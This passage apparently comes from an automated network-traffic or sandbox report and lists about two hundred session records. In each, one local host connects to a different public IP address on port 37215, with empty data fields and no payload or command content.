                                                          6788192.168.2.1560068197.156.181.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6789192.168.2.1549266147.54.197.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6790192.168.2.154800434.158.4.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6791192.168.2.153375841.207.195.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6792192.168.2.154734241.120.236.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6793192.168.2.155319441.44.205.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6794192.168.2.1533616197.180.100.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6795192.168.2.1535116197.189.243.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6796192.168.2.1535944106.8.32.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6797192.168.2.1536144197.117.23.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6798192.168.2.1538612188.33.250.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6799192.168.2.1534312157.46.212.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6800192.168.2.1534212157.76.225.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6801192.168.2.153787441.119.11.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6802192.168.2.1540666157.145.184.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6803192.168.2.155280641.186.19.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6804192.168.2.1545406197.26.158.1937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6805192.168.2.155674670.164.187.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6806192.168.2.154880241.183.200.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6807192.168.2.153549674.172.67.15037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6808192.168.2.1549756156.131.43.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6809192.168.2.1547958202.220.215.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6810192.168.2.154014241.33.90.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6811192.168.2.1537898139.73.172.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6812192.168.2.1556698197.224.50.13537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6813192.168.2.155287441.162.130.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6814192.168.2.153420041.106.8.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6815192.168.2.1545740197.146.238.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6816192.168.2.153659490.178.17.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6817192.168.2.1542454197.192.146.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6818192.168.2.155150066.25.251.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6819192.168.2.1541954197.75.184.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6820192.168.2.1551590157.176.119.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6821192.168.2.1543218162.252.201.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6822192.168.2.1553370117.149.7.13937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6823192.168.2.1552042157.115.98.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6824192.168.2.1555354157.192.32.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6825192.168.2.155717041.117.50.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6826192.168.2.1554198157.80.86.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6827192.168.2.154629618.7.186.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6828192.168.2.1551422157.127.163.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6829192.168.2.155779841.105.195.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6830192.168.2.155021241.84.86.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6831192.168.2.1535644197.133.137.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6832192.168.2.1535246197.79.82.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6833192.168.2.153542441.50.218.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6834192.168.2.1551700157.115.194.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6835192.168.2.1537730157.217.57.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6836192.168.2.1535538197.224.123.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6837192.168.2.155661499.106.142.21037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6838192.168.2.153633641.19.22.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6839192.168.2.1553914197.214.250.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6840192.168.2.1538178157.138.29.20437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6841192.168.2.156005041.191.174.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6842192.168.2.155118080.115.243.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6843192.168.2.154729041.250.138.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6844192.168.2.1545386197.74.43.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6845192.168.2.1536448117.231.27.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6846192.168.2.1556864158.187.49.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6847192.168.2.154127241.197.137.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6848192.168.2.155812041.189.50.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6849192.168.2.1556558197.140.154.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6850192.168.2.1555572157.234.164.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6851192.168.2.155988841.47.115.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6852192.168.2.1543212157.185.247.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6853192.168.2.1548486115.73.3.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6854192.168.2.1534484157.61.13.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6855192.168.2.155744441.56.4.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6856192.168.2.154863838.137.105.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6857192.168.2.154835641.171.84.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6858192.168.2.1538680193.158.238.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6859192.168.2.153864032.237.197.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6860192.168.2.1549236209.139.209.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6861192.168.2.154307296.213.182.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6862192.168.2.155823641.140.187.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6863192.168.2.1553380157.108.12.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6864192.168.2.155379841.164.4.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6865192.168.2.1535856157.254.118.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6866192.168.2.155618241.46.51.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6867192.168.2.153551841.132.190.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6868192.168.2.154344641.173.58.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6869192.168.2.1549438157.30.125.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6870192.168.2.1542050138.173.59.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6871192.168.2.1548736157.63.177.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6872192.168.2.1546454197.171.141.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6873192.168.2.154692641.79.69.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6874192.168.2.1546850197.134.68.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6875192.168.2.155216041.29.172.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6876192.168.2.1551642181.7.103.24537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6877192.168.2.155038241.34.76.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6878192.168.2.156055641.41.153.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6879192.168.2.1551594157.222.2.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6880192.168.2.1546552157.52.187.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6881192.168.2.153933859.253.9.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6882192.168.2.154898883.194.32.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6883192.168.2.1553814197.206.128.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6884192.168.2.1551236157.241.147.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6885192.168.2.155903241.148.79.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6886192.168.2.1543002157.194.16.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6887192.168.2.155826441.99.154.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6888192.168.2.154617041.11.151.4237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6889192.168.2.1555602157.93.177.24137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6890192.168.2.1551082157.187.219.12237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6891192.168.2.155703093.82.3.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6892192.168.2.1536664197.31.15.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6893192.168.2.1540326157.43.191.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6894192.168.2.154100041.92.248.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6895192.168.2.1549008197.215.185.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6896192.168.2.156036641.247.228.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6897192.168.2.154662841.16.37.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6898192.168.2.1558956197.12.1.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6899192.168.2.154301441.176.173.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6900192.168.2.154674068.206.101.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6901192.168.2.1542042222.145.165.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6902192.168.2.1559262116.65.32.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6903192.168.2.155643841.63.77.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6904192.168.2.1555660197.144.57.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6905192.168.2.1537130197.97.205.4737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6906192.168.2.1552540165.86.166.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6907192.168.2.155973841.187.143.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6908192.168.2.155476447.233.203.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6909192.168.2.154180841.68.115.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6910192.168.2.155766041.196.193.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6911192.168.2.155182041.131.205.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6912192.168.2.156075839.61.249.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6913192.168.2.153851494.106.29.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6914192.168.2.1560402197.79.202.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6915192.168.2.1558398197.14.106.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6916192.168.2.1532916157.13.208.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6917192.168.2.1554748157.40.113.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6918192.168.2.154950681.138.251.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6919192.168.2.155156413.37.205.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6920192.168.2.1534760157.167.47.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6921192.168.2.153299641.6.196.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6922192.168.2.1539544100.221.47.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6923192.168.2.154286641.236.185.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6924192.168.2.1533338203.140.203.8437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6925192.168.2.154482240.56.131.17937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6926192.168.2.1541978197.32.61.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6927192.168.2.1541322197.0.10.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6928192.168.2.1536342197.202.237.22037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6929192.168.2.1539464157.52.26.25037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6930192.168.2.1545026197.139.246.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6931192.168.2.153314841.228.116.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6932192.168.2.1559180147.47.138.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6933192.168.2.155760841.73.61.21837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6934192.168.2.1536742183.246.230.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6935192.168.2.1532912157.70.153.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6936192.168.2.154706241.252.181.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6937192.168.2.153839241.184.152.7137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6938192.168.2.1553022125.35.101.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6939192.168.2.1559194128.15.210.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6940192.168.2.1550970107.19.70.12137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6941192.168.2.1554274135.221.66.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6942192.168.2.1550740157.167.115.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6943192.168.2.155859841.2.91.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6944192.168.2.1534522178.125.9.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6945192.168.2.1539242157.241.209.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6946192.168.2.1549130157.81.14.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6947192.168.2.153741841.66.87.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6948192.168.2.1538726197.242.4.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6949192.168.2.1548604212.174.182.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6950192.168.2.1550202157.54.157.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6951192.168.2.1560234197.165.170.18037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6952192.168.2.1560334204.180.165.437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6953192.168.2.1542562197.98.174.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6954192.168.2.1536670157.57.43.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6955192.168.2.1548476212.100.128.13337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6956192.168.2.155039841.113.187.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6957192.168.2.154253241.230.83.16237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6958192.168.2.1532836202.240.134.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6959192.168.2.155573641.134.30.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6960192.168.2.15385629.141.63.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6961192.168.2.154856285.249.211.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6962192.168.2.1548758197.130.88.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6963192.168.2.1543692157.41.153.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6964192.168.2.154037062.80.93.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6965192.168.2.1537214157.22.241.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6966192.168.2.155734041.91.178.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6967192.168.2.154090068.205.156.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6968192.168.2.1538644157.20.161.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6969192.168.2.153717441.63.99.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6970192.168.2.1536006162.251.80.15737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6971192.168.2.155597041.180.40.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6972192.168.2.1543674197.118.53.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6973192.168.2.1543808145.163.234.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6974192.168.2.1558916197.17.46.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6975192.168.2.1533774157.137.173.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6976192.168.2.1547280118.209.105.6437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6977192.168.2.1545310157.241.111.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6978192.168.2.1534304197.201.5.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6979192.168.2.1557140188.208.231.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6980192.168.2.1554466191.124.226.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6981192.168.2.1538020197.224.7.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6982192.168.2.155699441.41.163.1337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6983192.168.2.154634241.157.158.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6984192.168.2.155111868.192.47.9737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6985192.168.2.1534248118.172.72.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6986192.168.2.153673441.131.61.24337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6987192.168.2.1536522197.33.163.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6988192.168.2.155540841.122.158.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6989192.168.2.154806841.64.32.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6990192.168.2.156081241.29.242.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6991192.168.2.1532786157.220.59.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6992192.168.2.154469441.73.67.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6993192.168.2.1540356199.191.9.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6994192.168.2.1551896197.166.28.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6995192.168.2.1557766103.231.213.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6996192.168.2.154515441.80.113.3437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6997192.168.2.1542904197.12.185.13237215
                                                          TimestampBytes transferredDirectionData


